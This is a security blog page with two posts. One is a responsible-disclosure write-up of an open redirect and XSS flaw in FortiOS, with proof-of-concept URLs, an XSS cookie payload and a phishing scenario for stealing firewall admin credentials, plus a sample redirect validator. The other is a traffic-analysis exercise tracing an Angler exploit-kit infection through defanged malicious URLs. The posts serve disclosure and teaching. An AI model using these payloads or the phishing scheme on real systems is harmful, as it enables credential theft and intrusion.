Hacking while you're asleep
BehindTheFirewalls is a blog where you can find all the latest information about hacking techniques, new trends in IT security and the recent products offered by security manufacturers. We'll talk about Firewalls, IPS, Botnets...
Javier Nieto (http://www.blogger.com/profile/05976836878834402718)

2016-05-02 CVE-2016-3978 Open Redirect & XSS in FortiOS (Fortinet)<h2 style="text-align: justify;">
Introduction</h2>
<div style="text-align: justify;">
Some months ago, I reported to the Fortinet PSIRT team two vulnerabilities which affect different Fortigate firmware versions. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You probably know that "Fortinet is a leading provider of fast and secure cyber security solutions offers enterprise-level next generation firewalls and vast array of network security products."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As usual, I'm disclosing these vulnerabilities under a responsible disclosure model, which is (in my opinion) one of the best ways (in most cases) to publish technical details about a vulnerability.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can find the Fortinet public advisory <a href="http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability" target="_blank">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I'd like to thank the Spanish Fortinet team for helping me with the case by speeding it up.</div>
<h2 style="text-align: justify;">
Vulnerability Details</h2>
<h3>
Affected version</h3>
<div>
<ul>
<li>5.0 branch: 5.0.12 or below</li>
<li>5.2 branch: 5.2.2 or below</li>
</ul>
<div>
<br /></div>
<div>
*** <span style="text-align: justify;">4.3 and lower branches are not affected</span></div>
<div style="text-align: justify;">
</div>
</div>
<div>
<h3 style="text-align: justify;">
Open Redirect</h3>
<div>
<div style="text-align: justify;">
The <a href="https://www.owasp.org/index.php/Open_redirect" target="_blank">Open Redirect</a> is located in the Fortinet Fortigate web administration console.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Proof of concept:<br />
<br /></div>
<div style="text-align: justify;">
<ul>
<li>https://fortigate-management-ip-address/login?redir=http://evil-site</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
The "redir" parameter is not validated in any way, so I'm able to redirect the browser from the Fortigate web login portal to any malicious web site.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Case study example:<br />
<br /></div>
<div style="text-align: justify;">
</div>
<ol>
<li style="text-align: justify;">An attacker sends a phishing email to the firewall administrator with the link below: https://fortigate-management-ip-address/login?redir=http://evil-site (the attacker must first figure out the firewall management IP address).</li>
<li style="text-align: justify;">If the administrator clicks on the link, the real login portal appears, and the administrator is expected to type the admin credentials.</li>
<li style="text-align: justify;">Once the username and password are submitted, the browser is redirected to the attacker's evil-site, which hosts a fake Fortigate login portal. The credentials are requested again under the pretext of a wrong username or password.</li>
<li style="text-align: justify;">The administrator retypes the credentials; the evil-site receives them and redirects the browser back to the real firewall login portal.</li>
<li style="text-align: justify;">The administrator types the credentials once more and gets access to the real firewall. Meanwhile, the attacker has stolen the username and password.</li>
</ol>
</div>
</div>
<h3 style="text-align: justify;">
Cross Site Scripting</h3>
<div>
<div style="text-align: justify;">
<div>
The <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank">Cross Site Scripting</a> vulnerability is located in the Fortinet Fortigate web administration console.</div>
<div>
<br /></div>
</div>
</div>
</div>
<div>
<div style="text-align: justify;">
Proof of concept:<br />
<br /></div>
<div>
<ul>
<li style="text-align: justify;">https://fortigate-management-ip-address/login?redir=javascript:alert(document.cookie)</li>
</ul>
<div style="text-align: justify;">
<br /></div>
</div>
</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKcP37YSe0RX8L6U3uBtZuOuUlcXZyAQVO2ZzJJXpphnlGswCc1oiAy4Oxp5hVcdhmZ8fgv-28lYhcxnyA0ZY9P4tIA93LdUTgEN4jKDNAkIrwIeNpO7kkuZE4StjCg8tsj5Z2Ythigxc/s1600/xss-forti+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKcP37YSe0RX8L6U3uBtZuOuUlcXZyAQVO2ZzJJXpphnlGswCc1oiAy4Oxp5hVcdhmZ8fgv-28lYhcxnyA0ZY9P4tIA93LdUTgEN4jKDNAkIrwIeNpO7kkuZE4StjCg8tsj5Z2Ythigxc/s640/xss-forti+%25281%2529.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: start;">
<div style="text-align: justify;">
The "redir" parameter is not validated in any way, so JavaScript code can be executed in the victim's browser.</div>
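Added example, not Fortinet's code and not from the original post: a server-side validator for a login page's "redir" parameter that only accepts same-origin paths, which closes both the open redirect above and its "javascript:" XSS variant, plus output encoding when the value is echoed back into the form. The function names and the hidden-field markup are my own assumptions.

```python
import html
from urllib.parse import urlsplit, urlunsplit


def safe_redirect_target(redir, default="/"):
    """Return a same-origin path built from the untrusted "redir" value, or default.

    Only absolute paths on this host survive ("/system/status?tab=1"). Anything with a
    scheme (http:, javascript:, data:), an authority, or a prefix browsers interpret
    ambiguously is replaced by the default. Assumed helper, not FortiOS code.
    """
    if not redir:
        return default
    # Whitespace and control characters let tricks like "java\tscript:" past prefix checks.
    if any(ch.isspace() or ord(ch) < 0x20 or ord(ch) == 0x7F for ch in redir):
        return default
    # Some browsers treat "\" as "/", so "/\evil-site" would become "//evil-site".
    if "\\" in redir:
        return default
    # "//evil-site" and "///evil-site" are protocol-relative, i.e. off-site, URLs.
    if redir.startswith("//"):
        return default
    parts = urlsplit(redir)
    # Any scheme or host means the target is not this login portal.
    if parts.scheme or parts.netloc:
        return default
    if not parts.path.startswith("/"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


def hidden_redirect_field(redir):
    """Render the validated target back into the login form with output encoding,
    so a quote or angle bracket in the path cannot break out of the attribute."""
    target = html.escape(safe_redirect_target(redir), quote=True)
    return '<input type="hidden" name="redir" value="%s">' % target


if __name__ == "__main__":
    for sample in ("http://evil-site", "javascript:alert(document.cookie)",
                   "//evil-site", "/system/status?tab=1"):
        print("%-40r -> %r" % (sample, safe_redirect_target(sample)))
```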
<h2 style="text-align: justify;">
Solutions</h2>
</div>
</div>
<div>
<div>
<div style="text-align: justify;">
Upgrade to one of the following FortiOS versions:<br />
<br /></div>
<div style="text-align: justify;">
<ul>
<li>5.0 branch: 5.0.13 or above</li>
<li>5.2 branch: 5.2.3 or above</li>
<li>5.4 branch: 5.4.0 or above</li>
</ul>
<div>
<br /></div>
</div>
</div>
<div style="text-align: justify;">
More details: <a href="http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability" target="_blank">http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability</a></div>
</div>
<div>
<h2 style="text-align: justify;">
Conclusion</h2>
</div>
<div style="text-align: justify;">
Every single device or appliance in your network, even those that are part of your security infrastructure, can be affected by some vulnerability. We have seen how other well-known vendors such as Juniper, FireEye and Cisco were affected by similar vulnerabilities as well. This should always be kept in mind.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The vulnerabilities mentioned above are hard to exploit because the firewall administrator is not supposed to click on a link pointing at their own firewall... But who knows... ;)<br />
<h2>
References</h2>
<div>
<div>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3978" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3978</a></div>
<div>
<a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3978" target="_blank">https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3978</a></div>
<div>
<a href="http://www.securitytracker.com/id/1035332" target="_blank">http://www.securitytracker.com/id/1035332</a></div>
<div>
<a href="http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability" target="_blank">http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability</a></div>
<div>
<a href="http://seclists.org/fulldisclosure/2016/Mar/68">http://seclists.org/fulldisclosure/2016/Mar/68</a></div>
</div>
<div>
<br /></div>
</div>
Javier Nieto

2015-12-13 A Network Traffic Analysis Exercise<div style="text-align: justify;">
Network forensics is something we should practice as much as possible to become faster at detecting suspicious activity in our networks. The website <a href="http://malware-traffic-analysis.net/" target="_blank">http://malware-traffic-analysis.net/</a> shares network traffic captures in which we can find different kinds of infections and malicious activity. I find these examples quite good for improving our skills at spotting evil behaviour... We could also witness new attack vectors and new evasion techniques...<br />
<br /></div>
<div style="text-align: justify;">
<div>
<div style="text-align: justify;">
Today, we are going to do the last exercise: </div>
<div style="text-align: justify;">
<a href="http://malware-traffic-analysis.net/2015/11/24/index.html" target="_blank">http://malware-traffic-analysis.net/2015/11/24/index.html</a></div>
</div>
<h2 style="text-align: justify;">
Malware infection</h2>
<div>
<div style="text-align: justify;">
In the post mentioned above, a piece of malware was reported on a corporate computer. We can get more information about that sample from different malware analysis services.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
SHA256</div>
<div style="text-align: center;">
d16ad130daed5d4f3a7368ce73b87a8f84404873cbfc90cc77e967a83c947cd2</div>
</div>
<div>
<div style="text-align: center;">
<a href="https://malwr.com/analysis/ZTkxNzJiYmUyMTA2NGJhMmIwMzhhNjBkOTJmMmJhOGI/" target="_blank">malwr</a> <a href="https://www.virustotal.com/es/file/d16ad130daed5d4f3a7368ce73b87a8f84404873cbfc90cc77e967a83c947cd2/analysis/" target="_blank">Virustotal</a> <a href="https://www.file-analyzer.net/analysis/5789/16719/0/html" target="_blank">file-analyzer</a></div>
</div>
<h2>
Network traffic analysis</h2>
</div>
<div style="text-align: justify;">
<div>
To figure out what happened, we have to work with the traffic capture published in that blog post: <a href="http://malware-traffic-analysis.net/2015/11/24/2015-11-24-traffic-analysis-exercise.pcap" target="_blank">2015-11-24-traffic-analysis-exercise.pcap</a>. The first thing I'm going to do is use tcpreplay to replay the captured traffic on an interface where my Suricata is listening with the latest ETPRO ruleset loaded.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4730j6olY11c3sdreum0O_iMjcIdTtk1mejmoi9FXPeFWJRGg2AOy8KvveAVscja-72yiUjZr-X9dz3Kx78PdP-wB5CEoRhaW6BaFMrxwgAHBX9-vo71_6gMj3-vollp_j2EKxuiCWPg/s1600/ek-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4730j6olY11c3sdreum0O_iMjcIdTtk1mejmoi9FXPeFWJRGg2AOy8KvveAVscja-72yiUjZr-X9dz3Kx78PdP-wB5CEoRhaW6BaFMrxwgAHBX9-vo71_6gMj3-vollp_j2EKxuiCWPg/s640/ek-1.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
After all the traffic has been replayed and analyzed, we can see on our alerts dashboard that a computer may have been compromised by an exploit kit. There are also some CnC alerts...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsGAsUurnFRIx5JNCf28Gu7bS8KUZNezo9Abarh1PdAKHKb7Ib0xMOuU9ibF0p-CKAUYhUl_Zzj_-CmVLOjxcoWtm-S_Vjmkai4OuPTUmyw1hmaknHOTBth2DB4D9dtqYTsltAqgU4yAw/s1600/EK-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsGAsUurnFRIx5JNCf28Gu7bS8KUZNezo9Abarh1PdAKHKb7Ib0xMOuU9ibF0p-CKAUYhUl_Zzj_-CmVLOjxcoWtm-S_Vjmkai4OuPTUmyw1hmaknHOTBth2DB4D9dtqYTsltAqgU4yAw/s400/EK-3.png" width="400" /></a></div>
<br />
The first Angler EK alerts came from the website neuhaus-hourakus.avelinoortiz[.]com<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiW57L-xNRjRNc5LK8skXn313ClpSkfJNb5phm2nAAcjUdrPAYGJStLbM04Bp6ugcuD9pGgD6ieBdKXOeRFaR73pGvriP3eHyLF4tAAa1VV6X3oWLsplvBhyDZk1BPUuaI2lDLNGY1DvA/s1600/ek0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiW57L-xNRjRNc5LK8skXn313ClpSkfJNb5phm2nAAcjUdrPAYGJStLbM04Bp6ugcuD9pGgD6ieBdKXOeRFaR73pGvriP3eHyLF4tAAa1VV6X3oWLsplvBhyDZk1BPUuaI2lDLNGY1DvA/s640/ek0.png" width="640" /></a><br />
The order of the visits to that specific domain was:<br />
<br />
<ol>
<li>neuhaus-hourakus.avelinoortiz[.]com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29</li>
<li>neuhaus-hourakus.avelinoortiz[.]com/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT</li>
<li>neuhaus-hourakus.avelinoortiz[.]com/literature.disco?audience=5Hr&trip=&election=txK1BgKFW&piece=aRLmxzX&normal=QGOT&understand=IWOBe&theory=so8bghs&discover=y47E5&tell=gSIQ&opportunity=ZWe&available=z</li>
<li>neuhaus-hourakus.avelinoortiz[.]com/yes.wbxml?unite=tXu9a5tJI&writer=J7y8dCR8F&describe=LzQOS9&for=&note=C26Z8129ea&number=gcsXv8v&next=2unI-c8</li>
</ol>
<div>
We can see that this domain has been <a href="https://www.virustotal.com/es/domain/neuhaus-hourakus.avelinoortiz.com/information/" target="_blank">rated as malicious</a> by some web filtering vendors.</div>
<div>
<br /></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyT_p1bxdAiCgGPrJYrUukwjwMyMqj4jniBURgXr41kvMpt0p7PR5g6h4rCuUzS5VcwPobS3pzLXb_cj8Xxb8ZIQSdnOeBBRl2zoyY8AfjchN-EtnKsPd92PaYqk0TIUbNXXlCaXM2yMk/s1600/vt2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyT_p1bxdAiCgGPrJYrUukwjwMyMqj4jniBURgXr41kvMpt0p7PR5g6h4rCuUzS5VcwPobS3pzLXb_cj8Xxb8ZIQSdnOeBBRl2zoyY8AfjchN-EtnKsPd92PaYqk0TIUbNXXlCaXM2yMk/s640/vt2.png" width="640" /></a></div>
<div>
<br />
<div style="text-align: justify;">
I've also uploaded <a href="https://www.virustotal.com/es/file/07eef18fd4ef37e44bbf4530fe7ac5f96fa51b1002c53fc9ed6aa6dc42ed4706/analysis/" target="_blank">the PCAP to Virustotal</a> (look at the Details section). Virustotal is awesome because the traffic is inspected with the Snort-VTR and Suricata-ETPRO rulesets. Virustotal also analyzes all the requests, and if something is detected by some antivirus engine, Virustotal will warn us... We can see from the Virustotal report that one of the first Suricata alerts related to the EK corresponds to a Flash file which is related to an <a href="https://www.virustotal.com/es/file/470fdb11214c6d274bd0247d7845dc08e6d6d9e9a9c5edc65938c40ed2b0eeae/analysis/" target="_blank">Exploit</a>.</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd0y_0v_yxHy4KFiq6useyZ6Sfeo6Zx3PGL8wxtKvMTcPXgjoGstBa60-1LJOHI_TDPNrl5quP_P4Qkmra5_LNi3otGOt1ZSDsBGd23Bqvl425dFAFp4jB_o7y6SdoP8xvFPxDscPmuM/s1600/ek-vt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd0y_0v_yxHy4KFiq6useyZ6Sfeo6Zx3PGL8wxtKvMTcPXgjoGstBa60-1LJOHI_TDPNrl5quP_P4Qkmra5_LNi3otGOt1ZSDsBGd23Bqvl425dFAFp4jB_o7y6SdoP8xvFPxDscPmuM/s640/ek-vt.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
It seems we've found where the user could have been infected, but... why did the user end up at that website? If we look at the first Suricata event and look closely at the Referer field, we can see that the web page visited before the landing page contained a JavaScript file.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNpeRIvtRYhfo27iItnOysnjz7_aWMEZOy4eYAQ-PLouqyAAtC0tyuIZjGae3Mi8MswJCs15pKTAmWiXCwOwe_UILlK1lEuRaqum3i0s1yYOFzXVXqppRvnjjklj57COKKXftVNUWtZzk/s1600/ek4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNpeRIvtRYhfo27iItnOysnjz7_aWMEZOy4eYAQ-PLouqyAAtC0tyuIZjGae3Mi8MswJCs15pKTAmWiXCwOwe_UILlK1lEuRaqum3i0s1yYOFzXVXqppRvnjjklj57COKKXftVNUWtZzk/s1600/ek4.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Digging into that JavaScript, we find an iframe which loads the EK landing page (1), and the website which loaded the JavaScript (2).</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLrwxqSAeruNLDGV5lgBFk5ATYrl0L7OulWtYJ0mpTccc08hUuusfSqvPCmnnemtWyWcvqrKAQqZoN9oz9wTaqY-m9d5TPt7QMDWKgSvJ7QAc25DlNyT_GTCOgH54Hnxch8XJQU3UIL7o/s1600/xEK10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLrwxqSAeruNLDGV5lgBFk5ATYrl0L7OulWtYJ0mpTccc08hUuusfSqvPCmnnemtWyWcvqrKAQqZoN9oz9wTaqY-m9d5TPt7QMDWKgSvJ7QAc25DlNyT_GTCOgH54Hnxch8XJQU3UIL7o/s400/xEK10.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
If we keep working backwards with Wireshark, we can locate the URI which loaded the JavaScript. It seems that it could be an advertisement (1) which loaded the JavaScript (2).</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQhOV3SqHiutlXF3sIG04uakdmzS5D6dxArK5xwUndg56SfSs3dMJNovg8dfIFLb2qyWszkQ0u7k3aJ6bn2Uck7so-r5kbX4kNznCd6jyo53y0qI4dSp9GUY1S_9ESHOMM_5KYYB9pkJw/s1600/ek112+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQhOV3SqHiutlXF3sIG04uakdmzS5D6dxArK5xwUndg56SfSs3dMJNovg8dfIFLb2qyWszkQ0u7k3aJ6bn2Uck7so-r5kbX4kNznCd6jyo53y0qI4dSp9GUY1S_9ESHOMM_5KYYB9pkJw/s400/ek112+%25281%2529.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And... why did this user visit www.shotgunworld[.]com? If we look at the Referer field in the Follow TCP Stream view, we can see that the user was sent to that website by Google. The user could have been doing Google searches...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBv6p0CGZyxdepnwcp0gFR6PgZda7zCDGVUe6N5EVyoBodbylDMqnUOEAqqd7LwxqTLxXKvp1MiHYwzZdZk51gQ813-I1nlWc0yxdMN_RhYbtThJr0tpUVt3u90-luMAPI2_SUa3xoQUU/s1600/ek12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBv6p0CGZyxdepnwcp0gFR6PgZda7zCDGVUe6N5EVyoBodbylDMqnUOEAqqd7LwxqTLxXKvp1MiHYwzZdZk51gQ813-I1nlWc0yxdMN_RhYbtThJr0tpUVt3u90-luMAPI2_SUa3xoQUU/s400/ek12.png" width="400" /></a></div>
<br />
If we dig a little deeper into the connections made before the Google redirection, we can see that the user was interested in guns. He did two searches in Google:<br />
<br />
1. http://www.google[.]com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwimz-OWuqnJAhWJrD4KHZcYBLsQFggcMAA&url=http%3A%2F%2Fwww.cabelas.com%2Fcategory%2FShotguns%2F105537780.uts&usg=AFQjCNHKLe8zX3xPg6B1t17pycMEn7CRFw&bvm=bv.108194040,d.dmo<br />
<br />
which redirects to http://www.cabelas.com/category/Shotguns/105537780.uts which <a href="https://www.virustotal.com/es/url/bd3cfd63798002edf44bd55992aca539540a170f54027efc63a51673e3fb6b32/analysis/1449506037/" target="_blank">seems not to be infected</a>.<br />
<br />
2. http://www.google[.]com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA&url=http%3A%2F%2Fwww.shotgunworld.com%2F&usg=AFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw&bvm=bv.108194040,d.dmo<br />
<br />
which loads the <a href="https://www.virustotal.com/es/url/f213e2607e3291835dc91c29988ad370f70dd39388770d9f9ab986204915ccd2/analysis/1449506000/" target="_blank">EK landing page</a>: neuhaus-hourakus.avelinoortiz[.]com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29<br />
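Added example, not part of the original post: the Referer pivot described above (landing page, back to the page that carried the JavaScript, back to the site, back to the Google click-through), run over a constructed list of HTTP requests in the shape Wireshark's request list gives. The hosts seen on the page are defanged with "[.]" as the post does; ads.example and cdn.example are placeholders, not hosts from the real PCAP.

```python
from urllib.parse import parse_qs

# Constructed request list (timestamp in seconds, Host, request URI, Referer). The two
# placeholder hosts stand in for the advertisement page and the script it loaded.
REQUESTS = [
    {"ts": 10.0, "host": "www.google[.]com",
     "uri": "/url?sa=t&url=http%3A%2F%2Fwww.cabelas.com%2Fcategory%2FShotguns%2F105537780.uts",
     "referer": ""},
    {"ts": 10.4, "host": "www.cabelas[.]com", "uri": "/category/Shotguns/105537780.uts",
     "referer": "http://www.google[.]com/url?sa=t&url=http%3A%2F%2Fwww.cabelas.com%2Fcategory%2FShotguns%2F105537780.uts"},
    {"ts": 31.0, "host": "www.google[.]com",
     "uri": "/url?sa=t&url=http%3A%2F%2Fwww.shotgunworld.com%2F", "referer": ""},
    {"ts": 31.3, "host": "www.shotgunworld[.]com", "uri": "/",
     "referer": "http://www.google[.]com/url?sa=t&url=http%3A%2F%2Fwww.shotgunworld.com%2F"},
    {"ts": 31.9, "host": "ads.example", "uri": "/banner.html",        # placeholder ad page
     "referer": "http://www.shotgunworld[.]com/"},
    {"ts": 32.0, "host": "cdn.example", "uri": "/loader.js",          # placeholder script
     "referer": "http://ads.example/banner.html"},
    {"ts": 32.4, "host": "neuhaus-hourakus.avelinoortiz[.]com",
     "uri": "/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29",
     "referer": "http://ads.example/banner.html"},
    {"ts": 33.1, "host": "neuhaus-hourakus.avelinoortiz[.]com",
     "uri": "/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT",
     "referer": "http://neuhaus-hourakus.avelinoortiz[.]com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29"},
]


def _without_scheme(url):
    """Drop "http://" or "https://" so a Referer can be compared with host + uri."""
    return url.split("://", 1)[1] if "://" in url else url


def find_request(requests, host, uri):
    for req in requests:
        if req["host"] == host and req["uri"] == uri:
            return req
    return None


def referer_chain(requests, host, uri):
    """Walk Referer headers backwards from one request; returns the chain root-first."""
    current = find_request(requests, host, uri)
    chain, seen = [], set()
    while current is not None and id(current) not in seen:
        seen.add(id(current))
        chain.append(current)
        ref = _without_scheme(current["referer"])
        if not ref:
            break
        # The parent is the latest earlier request whose host + uri equals the Referer.
        candidates = [r for r in requests
                      if r["ts"] < current["ts"] and r["host"] + r["uri"] == ref]
        current = max(candidates, key=lambda r: r["ts"]) if candidates else None
    chain.reverse()
    return chain


def loaded_by(requests, host, uri):
    """Every resource whose Referer is the given page: this is where the ad's
    JavaScript and the iframe-loaded landing page show up side by side."""
    page = host + uri
    return [r for r in requests if _without_scheme(r["referer"]) == page]


def search_redirect_target(uri):
    """Decode the url= parameter of a Google /url?... click-through redirect."""
    query = uri.split("?", 1)[1] if "?" in uri else ""
    return parse_qs(query).get("url", [""])[0]


if __name__ == "__main__":
    landing = ("neuhaus-hourakus.avelinoortiz[.]com",
               "/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29")
    for req in referer_chain(REQUESTS, *landing):
        print("%6.1f  %s%s" % (req["ts"], req["host"], req["uri"]))
```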
<div>
<br />
<div style="text-align: justify;">
And... what about the landing page? I've continued the analysis and found heavily obfuscated code inside the HTML.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjwgpFMoFPmQ0OIyoYU7VfFmIZcBQCXVBkfuuflR8Tyv743JmjJpSJLzr-qX8v-JPqIMrYa6cnapE_wOgtOEsHlQ0W0SG_0BKSIWP-uAy2EOICXcFfh9tcEeesZ2C3kVBVoCmXh4p3jE/s1600/ek2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjwgpFMoFPmQ0OIyoYU7VfFmIZcBQCXVBkfuuflR8Tyv743JmjJpSJLzr-qX8v-JPqIMrYa6cnapE_wOgtOEsHlQ0W0SG_0BKSIWP-uAy2EOICXcFfh9tcEeesZ2C3kVBVoCmXh4p3jE/s400/ek2.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
I've extracted it from the PCAP using Wireshark and the results can be seen at <a href="https://www.virustotal.com/es/file/d1f5e27ec192709e1e565bcf67d335442ab4191a107ab568a09793e0a12e72c5/analysis/1449601755/" target="_blank">Virustotal</a>. I've also uploaded it to <a href="http://pastebin.com/raw.php?i=i22fMrZB" target="_blank">Pastebin</a>. As said, this JavaScript is heavily obfuscated and deobfuscating it would be time consuming, but if you want to try it yourself, you are very welcome. I would like to share some good blog posts where you can find more info about Angler Exploit Kit obfuscation: <a href="http://community.websense.com/blogs/securitylabs/archive/2015/02/05/angler-exploit-kit-operating-at-the-cutting-edge.aspx" target="_blank">Websense</a>, <a href="http://www.fuzzysecurity.com/tutorials/22.html" target="_blank">Fuzzysecurity</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Since we haven't deobfuscated the Angler landing page code, we cannot be 100% sure that it is related to the malware found on the computer, but I think we can assume so... After the host visited that URL, the computer started requesting suspicious URLs related to a botnet:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS4ferRJbmdHsNnCW6ibkpJVxHGl_CBNPGn4YD0fyWmtMGnxWC-GNcMKpMiczDp84R3dz722oR5Lo3OvO961_XC7rX5z9H8DV6b9Q5cxPf29qc1nzTqlQaB7zpq1RvJjVofRTYt8NwDzc/s1600/botnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS4ferRJbmdHsNnCW6ibkpJVxHGl_CBNPGn4YD0fyWmtMGnxWC-GNcMKpMiczDp84R3dz722oR5Lo3OvO961_XC7rX5z9H8DV6b9Q5cxPf29qc1nzTqlQaB7zpq1RvJjVofRTYt8NwDzc/s400/botnet.png" width="400" /></a></div>
<br />
The computer even started requesting domain names that didn't resolve...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3OXXVi044sFZLXYhKsSgYLOEdTY-K8k6I0YyDaEez_c11mlGSAMpXyRcDthH0bp11Y9Ivn4CDxbWrKGc9e1vaC9JMT_U06K6tHyxkeHBaqD4trZ08pXQluB3goP7gPVIwLq5spf4z8uQ/s1600/EK20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3OXXVi044sFZLXYhKsSgYLOEdTY-K8k6I0YyDaEez_c11mlGSAMpXyRcDthH0bp11Y9Ivn4CDxbWrKGc9e1vaC9JMT_U06K6tHyxkeHBaqD4trZ08pXQluB3goP7gPVIwLq5spf4z8uQ/s640/EK20.png" width="640" /></a></div>
<br />
Those domains could have been generated by a domain generation algorithm (DGA). This could be an indicator that the computer had become part of a botnet.<br />
